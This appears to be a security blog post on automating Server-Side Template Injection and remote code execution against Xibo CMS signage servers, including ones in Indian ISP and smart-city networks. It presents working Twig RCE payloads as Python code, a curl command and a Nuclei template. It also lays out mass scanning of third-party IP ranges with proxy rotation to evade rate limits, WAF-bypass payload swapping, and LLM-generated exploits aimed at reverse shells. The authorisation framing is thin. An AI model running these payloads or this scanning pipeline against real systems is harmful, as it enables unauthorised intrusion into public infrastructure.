Building Custom Web Scanners: Automating SSTI and RCE Detection for Xibo CMS and Beyond
I recently audited a series of digital signage deployments across several Indian Tier-2 cities. During this research, I identified a recurring pattern of unpatched Xibo CMS instances exposed on public IP ranges belonging to AS9829 (BSNL) and AS55836 (Reliance Jio). These systems, often managed by local advertising vendors, frequently run outdated versions (v2.x and early v3.x) that are vulnerable to Server-Side Template Injection (SSTI).
Defining Automation in Modern Security Research
Automation in security research is the transition from point-and-click exploitation to programmatic discovery. We no longer have the luxury of manually inspecting every HTTP response when dealing with thousands of assets. We build pipelines that ingest raw IP ranges, identify service fingerprints, and execute targeted vulnerability checks without human intervention.
The Evolution from Manual Pentesting to Automated Workflows
Traditional pentesting relied on Burp Suite and manual repeater attempts. While effective for deep logic flaws, it fails at the scale of modern Indian infrastructure. We now use "chained automation" where the output of a reconnaissance tool directly feeds into a fuzzer, which then triggers a notification bot upon finding a successful primitive.
Why Automation is Critical for Modern Web Architectures
Modern web architectures are ephemeral. Containers spin up and down, and cloud instances change IPs daily. If our scanning cycle takes a week, the asset we identified on Monday might be gone by Wednesday. Automation allows us to maintain a "living" asset inventory that updates in real-time as new subdomains or services are provisioned.
Key Benefits of Automating Security Research
The primary driver for automation is the sheer volume of the attack surface. In the context of Indian Smart City initiatives, hundreds of Xibo CMS nodes are deployed to manage public information displays. Manually checking each node for CVE-2022-40879, as documented in the NIST NVD, is not feasible.
Scaling Vulnerability Discovery Across Large Attack Surfaces
We use tools like nmap combined with custom scripts to find targets at scale. By automating the identification of the Xibo CMS fingerprint, we isolate potential targets from millions of unrelated web servers.
$ nmap -p 80,443 --script http-title,http-methods --script-args "http-methods.retest=1" -iL targets.txt | grep -i "Xibo"This command filters out everything except Xibo instances. When we run this against a /16 block, we reduce the noise by 99%, allowing us to focus our compute resources on the remaining 1%.
Improving Consistency and Reducing Human Error
A researcher might forget to check a specific header or miss a subtle difference in response timing. An automated script executes the same logic every time. When testing for SSTI, the payload must be exact. Automation ensures that every target receives the same rigorous testing parameters.
Accelerating the Bug Bounty and Research Lifecycle
In the bug bounty world, the "first to find" rule is absolute. Automation allows us to scan for newly disclosed CVEs across our entire database of assets within minutes of a PoC being released. If a new Twig SSTI bypass is discovered, we can update our Nuclei templates and scan all Indian-hosted Xibo instances before the vendors even begin their patching cycle.
Core Components of an Automated Security Pipeline
A robust pipeline consists of three distinct phases: reconnaissance, scanning, and verification. We treat each phase as a modular component that can be swapped or updated.
Automated Reconnaissance and Asset Discovery
We start by gathering data. For Indian infrastructure, we often look at specific ASNs. We use amass and subfinder to discover subdomains, then pipe those into httpx to verify active web services.
$ subfinder -d xibo-dashboard.local.in -silent | httpx -sc -td -titleThis gives us a clean list of URLs, status codes, and page titles. We look for titles containing "Xibo" or "Digital Signage CMS".
Integrating SAST, DAST, and IAST into Research Workflows
While DAST (Dynamic Application Security Testing) is our primary tool for remote research, we integrate SAST (Static) when we have access to the source code, such as the Xibo CMS GitHub repository. We look for sinks where user input is passed directly to the Twig render function.
Automating Vulnerability Verification and Proof-of-Concept Generation
Once a potential SSTI is found, we automate the verification. We don't just want a "49" (from {{7*7}}); we want a system command output to prove RCE. We use Python to handle the authentication and the subsequent payload delivery.
import requestsdef verify_ssti(target_url, token): payload = "{{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}" headers = {"Authorization": f"Bearer {token}"} data = {"name": payload, "description": "verification"}
r = requests.post(f"{target_url}/index.php?p=layout&do=add", headers=headers, data=data) if "uid=" in r.text: print(f"[+] Vulnerable: {target_url}") return True return False
Essential Tools and Frameworks for Automation
We rely on a mix of industry-standard tools and custom glue code. Python is the backbone of our custom logic, while Go-based tools provide the speed needed for network I/O.
Leveraging CLI Tools and Scripting (Python, Go, Bash)
Bash is used for piping data between tools. Go is used for high-performance scanning. Python is used for complex exploitation logic. For Xibo research, ffuf is invaluable for finding hidden API endpoints or testing multiple SSTI payloads against a single parameter.
$ ffuf -u http://TARGET/api/layout?name=FUZZ -w ./ssti_payloads.txt -mr "49" -t 50 -H "Authorization: Bearer [TOKEN]"Orchestration Platforms: Jenkins, GitHub Actions, and GitLab CI
We use GitHub Actions to run periodic scans. Every 24 hours, a workflow triggers that pulls the latest Indian IP ranges, runs our Xibo-specific Nuclei templates, and pushes any hits to a private Discord webhook.
Cloud-Native Security Scanning Tools
Nuclei is the gold standard for template-based scanning, often used when automating reconnaissance with Go and Nuclei templates. It allows us to codify our research into YAML files that can be shared and executed at scale.
id: xibo-ssti-detection
info: name: Xibo CMS Twig SSTI to RCE severity: critical requests: - method: POST path: - "{{BaseURL}}/index.php?p=layout&do=add" body: "name={{7*7}}&description=test" matchers: - type: word words: - "49" part: body extractors: - type: regex name: version regex: - "Xibo CMS v([0-9.]+)"
Advanced Techniques: AI and Machine Learning in Security Research
We are moving beyond simple regex matching. Large Language Models (LLMs) are now part of our exploit development workflow, particularly for bypassing complex filters.
Using LLMs for Code Analysis and Exploit Development
I use local LLMs like Llama-3 to analyze Xibo's PHP source code. By feeding the model a function that handles user input, I can ask it to generate Twig payloads that bypass specific sanitization routines. This is how we found that certain versions of Xibo only filtered {{ but not the alternative {% syntax.
Pattern Recognition for Zero-Day Discovery
We use machine learning to cluster HTTP responses. If a thousand Xibo instances return a 200 OK, but five return a 500 Internal Server Error when sent a specific payload, those five are anomalies worth manual investigation. This pattern often indicates a partial exploit or a different underlying configuration.
Automated Fuzzing and Payload Optimization
We don't just send a static list of payloads. Our fuzzer observes the response. If the application filters the word system, the fuzzer automatically tries passthru, shell_exec, or hex-encoded strings. This reactive automation is key to bypassing modern WAFs.
Overcoming Common Challenges in Automation
Automation is not a "set it and forget it" solution. It requires constant tuning to deal with the realities of the public internet.
Managing False Positives and Data Noise
A common issue in SSTI detection is that the number "49" might appear naturally in a page's response. We mitigate this by using unique mathematical operations like {{9876*5432}} and looking for the specific result 53646432.
Handling Complex Authentication and Session Management
Xibo CMS requires authentication for the Layout Designer. Our automation must first hit the /api/authorize endpoint, handle the OAuth2 flow, and maintain a valid session. We use a Python-based session manager that refreshes tokens automatically when they expire.
Bypassing Rate Limiting and WAF Protections Ethically
When scanning Indian infrastructure, we often hit rate limits imposed by ISPs. We use proxy rotation (using services like ProxyRack or custom AWS Lambda proxies) to distribute our requests across thousands of IPs, ensuring we don't disrupt the service we are testing.
Best Practices for Building a Sustainable Automation Stack
A sustainable stack is one that is documented, version-controlled, and compliant with local laws.
Prioritizing High-Impact Vulnerability Classes
We focus our automation on RCE, SSTI, and SQL Injection, which are staples of the OWASP Top 10. While XSS is common, it rarely leads to the level of system compromise we are researching. For Xibo, the SSTI in the Layout Designer is the "holy grail" because it grants full shell access to the web server.
Maintaining Ethical Standards and Legal Compliance
In India, the Digital Personal Data Protection (DPDP) Act 2023 has significant implications for security researchers. If our automation inadvertently accesses PII (Personally Identifiable Information), we are legally bound to report it without further exploitation. We ensure our payloads are non-destructive—executing id or whoami rather than rm -rf.
Continuous Monitoring vs. Scheduled Scanning
Scheduled scanning is good for compliance; continuous monitoring is better for security. We use a message queue (RabbitMQ) to handle a constant stream of targets, ensuring that our scanners are never idle and that results are integrated into a SIEM and log monitoring platform for real-time threat detection.
The Future of Web Security Research Automation
We are entering the era of the autonomous security agent. These are not just scripts; they are systems that can make decisions based on the feedback they receive from a target.
The Rise of Autonomous Security Agents
An autonomous agent could identify a Xibo CMS, realize it's version 3.1.0, look up recent Twig vulnerabilities, generate a custom payload, and attempt to gain a reverse shell—all without human input. We are currently experimenting with LangChain to connect our Nuclei scanners with LLM-based exploit generators.
Shift-Left: Moving Automation Closer to the Developer
The ultimate goal is to provide these automated tools to the developers of Xibo and other CMS platforms. By integrating SSTI checks into their CI/CD pipeline, they can catch these vulnerabilities before the code ever reaches a Smart City display in India.
Technical Insight: Exploiting the Twig Filter Callback
The most effective RCE payload for modern Twig environments (like those used in Xibo) leverages the registerUndefinedFilterCallback. This allows us to map any undefined filter to a PHP function like system.
$ curl -X POST -d 'name={{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id")}}' http://TARGET/index.php?p=layout&do=addIf the response contains uid=33(www-data), you have confirmed RCE. In Indian deployments, these servers often run as root or have weak sudo configurations, leading to full box compromise, which highlights the critical need for secure SSH access for teams to manage these remote assets safely.
Next Command: Use the following nuclei command to scan a list of targets specifically for the Twig environment version, which is a precursor to determining the correct SSTI payload:
$ nuclei -t templates/exposed-panels/xibo-detect.yaml -l targets.txt -o xibo_instances.txt